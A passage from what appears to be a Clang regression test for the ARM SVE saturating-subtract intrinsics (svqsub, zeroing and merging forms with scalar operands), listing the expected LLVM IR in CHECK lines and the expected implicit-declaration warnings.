x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP1]], <vscale x 16 x i8> [[TMP0]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP2]] // // CPP-CHECK-LABEL: @_Z18test_svqsub_n_s8_zu10__SVBool_tu10__SVInt8_ta( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> 
zeroinitializer // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer) // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP1]], <vscale x 16 x i8> [[TMP0]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP2]] // svint8_t test_svqsub_n_s8_z(svbool_t pg, svint8_t op1, int8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s8_z'}} return SVE_ACLE_FUNC(svqsub,_n_s8,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s16_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer) // CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP2]], <vscale x 8 x i16> [[TMP1]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP3]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s16_zu10__SVBool_tu11__SVInt16_ts( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer) // CPP-CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP2]], <vscale x 8 x i16> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP3]] // svint16_t test_svqsub_n_s16_z(svbool_t pg, svint16_t op1, int16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s16_z'}} return SVE_ACLE_FUNC(svqsub,_n_s16,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s32_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer) // CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP2]], <vscale x 4 x i32> [[TMP1]]) // CHECK-NEXT: ret <vscale x 4 x i32> 
[[TMP3]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s32_zu10__SVBool_tu11__SVInt32_ti( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer) // CPP-CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP2]], <vscale x 4 x i32> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP3]] // svint32_t test_svqsub_n_s32_z(svbool_t pg, svint32_t op1, int32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s32_z'}} return SVE_ACLE_FUNC(svqsub,_n_s32,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s64_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer) // CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP2]], <vscale x 2 x i64> [[TMP1]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP3]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s64_zu10__SVBool_tu11__SVInt64_tl( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer) // CPP-CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP2]], <vscale x 2 x i64> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP3]] // svint64_t test_svqsub_n_s64_z(svbool_t pg, svint64_t op1, int64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s64_z'}} return SVE_ACLE_FUNC(svqsub,_n_s64,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u8_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CHECK-NEXT: [[TMP1:%.*]] = 
call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer) // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP1]], <vscale x 16 x i8> [[TMP0]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP2]] // // CPP-CHECK-LABEL: @_Z18test_svqsub_n_u8_zu10__SVBool_tu11__SVUint8_th( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer) // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP1]], <vscale x 16 x i8> [[TMP0]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP2]] // svuint8_t test_svqsub_n_u8_z(svbool_t pg, svuint8_t op1, uint8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u8_z'}} return SVE_ACLE_FUNC(svqsub,_n_u8,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u16_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer) // CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP2]], <vscale x 8 x i16> [[TMP1]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP3]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u16_zu10__SVBool_tu12__SVUint16_tt( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer) // CPP-CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP2]], <vscale x 8 x i16> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP3]] // svuint16_t test_svqsub_n_u16_z(svbool_t pg, svuint16_t op1, uint16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u16_z'}} return SVE_ACLE_FUNC(svqsub,_n_u16,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u32_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 
x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer) // CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP2]], <vscale x 4 x i32> [[TMP1]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP3]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u32_zu10__SVBool_tu12__SVUint32_tj( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer) // CPP-CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.uqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP2]], <vscale x 4 x i32> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP3]] // svuint32_t test_svqsub_n_u32_z(svbool_t pg, svuint32_t op1, uint32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u32_z'}} return SVE_ACLE_FUNC(svqsub,_n_u32,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u64_z( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer) // CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP2]], <vscale x 2 x i64> [[TMP1]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP3]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_u64_zu10__SVBool_tu12__SVUint64_tm( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer) // CPP-CHECK-NEXT: [[TMP3:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.uqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], 
<vscale x 2 x i64> [[TMP2]], <vscale x 2 x i64> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP3]] // svuint64_t test_svqsub_n_u64_z(svbool_t pg, svuint64_t op1, uint64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_u64_z'}} return SVE_ACLE_FUNC(svqsub,_n_u64,_z,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s8_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // // CPP-CHECK-LABEL: @_Z18test_svqsub_n_s8_mu10__SVBool_tu10__SVInt8_ta( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CPP-CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // svint8_t test_svqsub_n_s8_m(svbool_t pg, svint8_t op1, int8_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s8_m'}} return SVE_ACLE_FUNC(svqsub,_n_s8,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s16_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s16_mu10__SVBool_tu11__SVInt16_ts( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 8 x i16> poison, i16 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 8 x i16> [[DOTSPLATINSERT]], <vscale x 8 x i16> poison, <vscale x 8 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 8 x i16> [[TMP2]] // svint16_t test_svqsub_n_s16_m(svbool_t pg, svint16_t op1, int16_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s16_m'}} return SVE_ACLE_FUNC(svqsub,_n_s16,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s32_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call 
<vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s32_mu10__SVBool_tu11__SVInt32_ti( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 4 x i32> poison, i32 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 4 x i32> [[DOTSPLATINSERT]], <vscale x 4 x i32> poison, <vscale x 4 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 4 x i32> [[TMP2]] // svint32_t test_svqsub_n_s32_m(svbool_t pg, svint32_t op1, int32_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s32_m'}} return SVE_ACLE_FUNC(svqsub,_n_s32,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_s64_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // // CPP-CHECK-LABEL: @_Z19test_svqsub_n_s64_mu10__SVBool_tu11__SVInt64_tl( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]]) // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 2 x i64> poison, i64 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP1:%.*]] = shufflevector <vscale x 2 x i64> [[DOTSPLATINSERT]], <vscale x 2 x i64> poison, <vscale x 2 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> [[TMP1]]) // CPP-CHECK-NEXT: ret <vscale x 2 x i64> [[TMP2]] // svint64_t test_svqsub_n_s64_m(svbool_t pg, svint64_t op1, int64_t op2) { // overload-warning@+2 {{implicit declaration of function 'svqsub_m'}} // expected-warning@+1 {{implicit declaration of function 'svqsub_n_s64_m'}} return SVE_ACLE_FUNC(svqsub,_n_s64,_m,)(pg, op1, op2); } // CHECK-LABEL: @test_svqsub_n_u8_m( // CHECK-NEXT: entry: // CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // 
CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // CHECK-NEXT: ret <vscale x 16 x i8> [[TMP1]] // // CPP-CHECK-LABEL: @_Z18test_svqsub_n_u8_mu10__SVBool_tu11__SVUint8_th( // CPP-CHECK-NEXT: entry: // CPP-CHECK-NEXT: [[DOTSPLATINSERT:%.*]] = insertelement <vscale x 16 x i8> poison, i8 [[OP2:%.*]], i64 0 // CPP-CHECK-NEXT: [[TMP0:%.*]] = shufflevector <vscale x 16 x i8> [[DOTSPLATINSERT]], <vscale x 16 x i8> poison, <vscale x 16 x i32> zeroinitializer // CPP-CHECK-NEXT: [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> [[TMP0]]) // 